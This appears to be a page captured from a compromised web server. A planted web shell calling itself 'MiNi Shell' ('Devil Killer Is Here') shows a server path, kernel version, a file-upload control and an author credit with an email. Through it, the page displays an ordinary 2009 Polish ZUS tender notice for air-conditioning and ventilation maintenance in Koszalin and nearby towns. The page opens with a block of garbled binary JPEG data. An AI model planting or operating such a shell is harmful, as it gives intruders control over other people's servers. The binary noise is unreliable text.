JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/175726-N-2009.html

<p class="kh_header"><b>Koszalin: Świadczenie usług w zakresie konserwacji i napraw instalacji klimatyzacyjnych i wentylacyjnych zainstalowanych w budynkach Oddziału ZUS w Koszalinie i Inspektoratu ZUS w Kołobrzegu oraz urządzeń  klimatyzacyjnych 
w Inspektoratach  ZUS w  Świdwinie, Szczecinku i Wałczu.</b><br>
<b>Numer ogłoszenia: 175726 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Koszalinie , ul. Juliana Fałata 30, 75-950 Koszalin, woj. zachodniopomorskie, tel. 094 3485500, 3485965, faks 094 3425262.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie konserwacji i napraw instalacji klimatyzacyjnych i wentylacyjnych zainstalowanych w budynkach Oddziału ZUS w Koszalinie i Inspektoratu ZUS w Kołobrzegu oraz urządzeń  klimatyzacyjnych 
w Inspektoratach  ZUS w  Świdwinie, Szczecinku i Wałczu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie konserwacji i napraw instalacji klimatyzacyjnych i wentylacyjnych zainstalowanych w budynkach Oddziału ZUS w Koszalinie i Inspektoratu ZUS w Kołobrzegu oraz urządzeń  klimatyzacyjnych w Inspektoratach  ZUS w  Świdwinie, Szczecinku i Wałczu.
 
Przedmiot zamówienia obejmuje:
a) konserwację instalacji klimatyzacyjnej i wentylacyjnej - co ? roku.;
b) naprawy urządzeń - w zależności po potrzeb.

Wykonawca gwarantuje części zamienne oraz zabezpiecza materiały niezbędne do wykonania usługi.
Dojazd do miejsca wykonania usługi (zarówno konserwacji i naprawy) odbywa się transportem i na koszt Wykonawcy. 

Cena konserwacji i naprawy obejmuje: dojazd, robociznę, materiały czyszczące, maty filtracyjne do klimakonwektorów.

Wartość zamówienia nie przekracza kwoty  133 000 euro. 

Zamawiający  dopuszcza  składanie ofert  częściowych :
- ZADANIE  NR 1 - Wentylacja w Inspektoracie ZUS w Kołobrzegu;
- ZADANIE  NR 2 - Klimatyzacja w Inspektoracie ZUS w Kołobrzegu;
- ZADANIE  NR  3 - Klimatyzatory stacjonarne i przenośne w Inspektoratach ZUS w Świdwinie, Szczecinku, Wałczu;
- ZADANIE  NR 4 - Wentylacja i klimatyzacja w Oddziale ZUS w Koszalinie;

Szczegółowe warunki realizacji zamówienia zostały zawarte we wzorze umowy , stanowiący  załącznik do siwz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.73.00.00-1, 39.71.70.00-1, 42.50.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> -------<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy :

1. spełniają warunki określone w art. 22 ust. 1, tj.:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień; 

2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami  zdolnymi  do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia  potencjału technicznego i osób zdolnych do wykonania zamówienia; 

3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4) nie podlegają wykluczeniu z postępowania ; 

2.  spełniają  warunki  podmiotowe  określone w specyfikacji tj.:

2.1. dysponują lub będą dysponować  min. 1 osobą , która będzie uczestniczyć w realizacji  przedmiotowego zamówienia ,posiadającą kwalifikacje  uprawniające do eksploatacji ( świadectwo kwalifikacji) :
- urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie  wyższym niż 1 kV; - (dla  wszystkich  zadań);

 - urządzeń wentylacyjnych, klimatyzacyjnych i chłodniczych, o mocy powyżej 50 kW ;- (dla  zadania nr 4 );

2.2. dysponują  lub będą dysponować min 1 osobą, która będzie uczestniczyć w realizacji  przedmiotowego zamówienia, posiadającą kwalifikacje do naprawy i konserwacji urządzeń zawierających substancje kontrolowane ( świadectwo kwalifikacji) ,zgodnie z art. 9 ust.1 ustawy z dnia 20.04.2004 r. o substancjach zubożających warstwę ozonową (Dz. U. z 2004 r. Nr 121, poz. 1263 ze zm.); - ( dla
 zadania nr 2,3,4);

2.3. dysponują lub będą dysponować wyposażeniem technicznym  do obsługi technicznej oraz naprawy urządzeń i instalacji zawierających substancje kontrolowane wymienione  w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 2 września 2004r. w sprawie szczegółowych wymagań dla wyposażenia technicznego stosowanego przy wykonywaniu działalności związanej z substancjami kontrolowanymi (Dz.U. z 2004r. Nr 202, poz. 2071); -  ( dla  zadania nr 2,3,4);

2.4. dysponują lub będą dysponować wyposażeniem technicznym do obsługi technicznej oraz naprawy urządzeń lub instalacji zawierających  powyżej 3 kg czynnika chłodzącego wymienionego w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 2 września 2004r. w sprawie szczegółowych wymagań dla wyposażenia technicznego stosowanego przy wykonywaniu działalności związanej z substancjami kontrolowanymi (Dz.U. z 2004r. Nr 202,  poz. 2071); ( dla zadania nr 2,3,4);

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą  (spełnia - nie spełnia ), w oparciu o treść informacji  zawartych w wymaganych oświadczeniach i dokumentach  wyszczególnionych w  rozdziale IV podrozdział  III  specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca składa wraz z ofertą następujące dokumenty i oświadczenia: 

1.1. Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:

1) oświadczenie potwierdzające spełnianie przez Wykonawcę warunków określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych; sporządzone według wzoru stanowiącego załącznik do  specyfikacji:

2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

3) wykaz osób, którymi  dysponuje lub będzie dysponował Wykonawca i  które będą uczestniczyć w wykonywaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia,  na potwierdzenie spełniania warunku określonego w rozdziale IV, podrozdział I, pkt 2 ppkt 2.1.i 2.2. specyfikacji ; sporządzony według wzoru stanowiącego załącznik do specyfikacji; 

(należy podłączyć: ważne świadectwa kwalifikacji uprawniające do eksploatacji urządzeń, instalacji i sieci  elektroenergetycznych o napięciu do 1 kV / ważne świadectwo kwalifikacji uprawniające do eksploatacji urządzeń wentylacyjnych,
 klimatyzacyjnych i chłodniczych o mocy powyżej 50 kW / ważne świadectwa  kwalifikacji do naprawy i konserwacji urządzń zawierających substancje kontrolowane ) - (kopie potwierdzone za zgodność z oryginałem  przez Wykonawcę); 

 4) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 3) Wykonawca wskazał  osoby, którymi będzie dysponował; 
   
5) wykaz wyposażenia technicznego stosowanego do obsługi technicznej oraz naprawy urządzeń i instalacji zawierających substancje kontrolowane, wymienionego w Rozporządzeniu Ministra  Gospodarki  i Pracy z dnia 02.09.2004r. w sprawie szczegółowych wymagań dla wyposażenia technicznego stosowanego przy wykonywaniu działalności związanej z substancjami kontrolowanymi (Dz.U. z 2004r. Nr 202, poz. 2071) , którym Wykonawca dysponuje , a  jeżeli Wykonawca będzie dysponował , dodatkowo pisemne zobowiązanie innych podmiotów do  udostępnienia wyposażenia technicznego stosowanego do obsługi technicznej oraz naprawy  urządzeń i instalacji zawierających substancje kontrolowane; - sporządzony według wzoru stanowiącego załącznik do specyfikacji;

6) wykaz wyposażenia technicznego stosowanego do obsługi technicznej oraz naprawy urządzeń  lub instalacji zawierających powyżej 3  kg czynnika chłodniczego , wymienionego w Rozporządzeniu Ministra  Gospodarki  i Pracy z dnia 02.09.2004r. w sprawie szczegółowych wymagań dla wyposażenia  technicznego stosowanego przy wykonywaniu działalności związanej z substancjami kontrolowanymi  (Dz.U. z 2004r. Nr 202, poz. 2071) , którym Wykonawca dysponuje, a jeżeli Wykonawca będzie dysponował , dodatkowo pisemne zobowiązanie innych podmiotów do  udostępnienia wyposażenia technicznego  stosowanego do obsługi technicznej oraz naprawy urządzeń lub  instalacji  zawierających powyżej 3 kg czynnika chłodniczego; - sporządzony według wzoru stanowiącego  załącznik do specyfikacji;

2.Wykonawcy zagraniczni.
 2.1.Wykonawca zagraniczny (mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej) zamiast dokumentów wskazanych w pkt 1.1. ppkt 2)- składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w pkt 2.1. Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów. 
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do  reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w  sprawie zamówienia publicznego.  

Wykonawcy ubiegający się wspólnie, składają jedną ofertę, przy czym:  
a) wymagane oświadczenia i dokumenty wskazane w  pkt 1.1 ppkt 2)  składa każdy z Wykonawców;
b) oświadczenie potwierdzające spełnianie warunków określonych w art. 22 ust.1 ustawy (wskazane w  pkt 1.1 ppkt 1) w części obejmującej warunki wskazane w art. 22 ust.1 pkt  4 ustawy składa  każdy z Wykonawców, zaś w części obejmującej warunki wskazane w art. 22 ust.1 pkt  1- 3 ustawy -  wszyscy Wykonawcy wspólnie, 
c) pozostałe dokumenty składają wszyscy Wykonawcy wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - cena roboczogodziny naprawy - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siwz można uzyskać nieodpłatnie w siedzibie Zamawiającego w Koszalinie, ul. Fałata 30, osobiście pok. 318 lub pocztą na pisemny wniosek Wykonawcy  na nr fax: +48-94 -342 52 62..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2009 godzina 11:00, miejsce: siedziba Zamawiającego w Koszalinie , ul. J. Fałata 30 , parter Kancelaria ..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wentylacja w Inspektoracie ZUS w Kołobrzegu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1:Wentylacja w Inspektoracie ZUS w Kołobrzegu;

 Przedmiot zamówienia obejmuje:
-Konserwację instalacji  wentylacyjnej:Częstotliwość konserwacji: co ? roku.

-Naprawy urządzeń:Częstotliwość: w zależności od potrzeb.

Wykonawca gwarantuje części zamienne oraz zabezpiecza materiały niezbędne do wykonania usługi.
Dojazd do miejsca wykonania usługi (zarówno konserwacji i naprawy) odbywa się transportem i na koszt Wykonawcy. 
Cena konserwacji i naprawy obejmuje: dojazd, robociznę, materiały czyszczące, maty filtracyjne do klimakonwektorów.

Szczegółowe warunki realizacji zamówienia zostały zawarte we siwz i wzorze umowy ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.73.00.00-1, 39.71.70.00-1, 42.50.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. cena roboczogodziny naprawy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Klimatyzacja w Inspektoracie ZUS w Kołobrzegu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 - Klimatyzacja w Inspektoracie ZUS w Kołobrzegu;

 Przedmiot zamówienia obejmuje:
-Konserwację instalacji klimatyzacyjnej :Częstotliwość konserwacji: co ? roku.

-Naprawy urządzeń:Częstotliwość: w zależności od potrzeb.

Wykonawca gwarantuje części zamienne oraz zabezpiecza materiały niezbędne do wykonania usługi.

Dojazd do miejsca wykonania usługi (zarówno konserwacji i naprawy) odbywa się transportem i na koszt Wykonawcy. 
Cena konserwacji i naprawy obejmuje: dojazd, robociznę, materiały czyszczące, maty filtracyjne do klimakonwektorów.

Szczegółowe warunki realizacji zamówienia zostały zawarte we siwz i wzorze umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.73.00.00-1, 39.71.70.00-1, 42.50.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. cena roboczogodziny naprawy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Klimatyzatory stacjonarne i przenośne w Inspektoratach ZUS w Świdwinie, Szczecinku, Wałczu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3:Klimatyzatory stacjonarne i przenośne w Inspektoratach ZUS w Świdwinie, Szczecinku, Wałczu.

 Przedmiot zamówienia obejmuje:
-Konserwację instalacji klimatyzacyjnej :Częstotliwość konserwacji: co ? roku.

-Naprawy urządzeń:Częstotliwość: w zależności od potrzeb.

Wykonawca gwarantuje części zamienne oraz zabezpiecza materiały niezbędne do wykonania usługi.
Dojazd do miejsca wykonania usługi (zarówno konserwacji i naprawy) odbywa się transportem i na koszt Wykonawcy. 

Cena konserwacji i naprawy obejmuje: dojazd, robociznę, materiały czyszczące, maty filtracyjne do klimakonwektorów.

Szczegółowe warunki realizacji zamówienia zostały zawarte we siwz i wzorze umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.73.00.00-1, 39.71.70.00-1, 42.50.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. cena roboczogodziny naprawy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wentylacja i klimatyzacja w Oddziale ZUS w Koszalinie..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wentylacja i klimatyzacja w Oddziale ZUS w Koszalinie.

Przedmiot zamówienia obejmuje:
-Konserwację instalacji klimatyzacyjnej i wentylacyjnej:Częstotliwość konserwacji: co ? roku.

-Naprawy urządzeń:Częstotliwość: w zależności od potrzeb.

Wykonawca gwarantuje części zamienne oraz zabezpiecza materiały niezbędne do wykonania usługi.
Dojazd do miejsca wykonania usługi (zarówno konserwacji i naprawy) odbywa się transportem i na koszt Wykonawcy. 
Cena konserwacji i naprawy obejmuje: dojazd, robociznę, materiały czyszczące, maty filtracyjne do klimakonwektorów.

Szczegółowe warunki realizacji zamówienia zostały zawarte we siwz i wzorze umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.73.00.00-1, 39.71.70.00-1, 42.50.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. cena roboczogodziny naprawy - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com